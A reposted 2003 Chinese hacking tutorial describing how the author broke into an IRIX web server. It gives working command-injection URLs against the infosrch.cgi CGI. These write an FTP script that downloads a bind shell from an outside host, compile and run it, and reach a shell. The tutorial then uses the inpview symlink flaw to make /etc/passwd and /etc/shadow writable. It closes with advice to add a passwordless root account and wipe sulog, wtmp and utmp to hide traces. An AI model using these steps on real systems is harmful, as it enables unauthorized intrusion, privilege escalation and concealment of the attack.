登录社区:用户名: 密码: 忘记密码 网页功能:加入收藏 设为首页 网站搜索  

文档

下载

图书

论坛

安全

源码

硬件

游戏
首页 信息 空间 VB VC Delphi Java Flash 补丁 控件 安全 黑客 电子书 笔记本 手机 MP3 杀毒 QQ群 产品库 分类信息 编程网站
  立华软件园 - 安全技术中心 - 技术文档 - 黑客教学 技术文章 | 相关下载 | 电子图书 | 攻防录像 | 安全网站 | 在线论坛 | QQ群组 | 搜索   
 安全技术技术文档
  · 安全配制
  · 工具介绍
  · 黑客教学
  · 防火墙
  · 漏洞分析
  · 破解专题
  · 黑客编程
  · 入侵检测
 安全技术工具下载
  · 扫描工具
  · 攻击程序
  · 后门木马
  · 拒绝服务
  · 口令破解
  · 代理程序
  · 防火墙
  · 加密解密
  · 入侵检测
  · 攻防演示
 安全技术论坛
  · 安全配制
  · 工具介绍
  · 防火墙
  · 黑客入侵
  · 漏洞检测
  · 破解方法
 其他安全技术资源
  · 攻防演示动画
  · 电子图书
  · QQ群组讨论区
  · 其他网站资源
最新招聘信息

一次尝试IRIX的过程(nobody shell)
发表日期:2003-08-13作者:quack[] 出处:  

 有个家伙跟我说过某个站点是IRIX,有个infosrch的cgi漏洞,OK,假定该站为www.targe.co.jp吧

1、http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|ls%20-la

  这就是它的利用方法了。其中ls -la是我们要运行的命令,我不太习惯在web shell里面干活,还

  是要弄出一个shell有个$来得方便些,于是就用ftp。

2、http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=echo%20open%20www.xfocus.org>/tmp/a

  ……

  ……

  上面这些其实就是把这一段东西输进/tmp/a中:

  open www.xfocus.org      <---------别当真,这里没有这个东西;)

  user quack quack       <---------我的用户名密码

  binary

  cd /home/quack

  lcd /tmp

  prompt

  get bindshell.c        <---------这是一个绑定shell的东西,网上到处有

  bye

 

  http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|nohup%20ftp%20-ivn%20</tmp/a

  这里呢,就是在运行ftp取回东西了;)这么拿文件的话在xferlog里不会有记录。

  http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/usr/local/bin/gcc%20/tmp/bindshell.c%20-o%20/tmp/abc

  编译

  http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/tmp/abc

  运行……

3、现在我们可以telnet上去了

  bash# telnet *.*.*.* 12345

  Trying *.*.*.*...

  Connected to *.*.*.*.

  Escape character is '^]'.

  sh -i;

  $ id;

  uid=60001(nobody) gid=60001(nobody)

  $

4、利用IRIX的inpview漏洞,该漏洞的描述如下:

  某些版本IRIX下的inpview会在/var/tmp/目录下不安全地建立临时文件,这些临时文

  件名并不随机,用户可以建立一个符号链接到其他文件,利用inpview的

  setuid-to-root权限覆盖其他文件,同时对应文件权限被更改成0666。

  漏洞利用程序就不贴了,大家自己看看,很简单的,总之编译完成之后。

  $ ./a.out /etc/passwd;

  copyright LAST STAGE OF DELIRIUM jan 2000 poland //lsd-pl.net/

  /usr/lib/InPerson/inpview for irix 6.5 6.5.8 IP:all

  looking for temporary file... found!

  ……

  ……

 

  $ ./a.out /etc/shadow;

  ……

  ……

  就把这两个破文件的权限都改成0666了,往下该干什么活不用我说了吧……

  加个uid0的帐号,密码为空,修改系统,删除sulog\weblog\wtmp\utmp里的记录以及把/tmp下面的

  东西干掉,把passwd和shadow恢复回原样,再touch一下。走人,睡觉。

  btw:一句题外话,现在IRIX的telnetd漏洞很猛呀,还好要有irix系统编译exploit,少了些小孩做坏

  事,还有,那天stardust说还有许多IRIX的lp默认密码为空,我看了一下,的确如此,印象中mixter

  写了一个小段子专门搜索网上lp空密码帐号的…… 

我来说两句】 【发送给朋友】 【加入收藏】 【返加顶部】 【打印本页】 【关闭窗口
中搜索 一次尝试IRIX的过程(nobody shell)

 ■ [欢迎对本文发表评论]
用  户:  匿名发出:
您要为您所发的言论的后果负责,故请各位遵纪守法并注意语言文明。

最新招聘信息

关于我们 / 合作推广 / 给我留言 / 版权举报 / 意见建议 / 广告投放 / 友情链接  
Copyright ©2001-2006 Lihuasoft.net webmaster(at)lihuasoft.net
网站编程QQ群   京ICP备05001064号 页面生成时间:0.00244